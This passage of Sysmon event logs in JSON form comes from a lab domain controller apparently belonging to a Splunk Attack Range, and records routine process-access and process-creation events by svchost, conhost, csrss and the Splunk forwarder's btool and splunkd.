C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.458\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-00100B440500}\r\nProcessId: 4276\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF0-5F25-0000-001050430500}\r\nParentProcessId: 4224\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.458","ProcessGuid":"{41C8662E-1FF0-5F25-0000-00100B440500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF0-5F25-0000-001050430500}","ParentProcessId":"4224","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nSourceProcessId: 4224\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00100B440500}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","SourceProcessId":"4224","SourceThreadId":"4220","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00100B440500}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00100B440500}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00100B440500}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 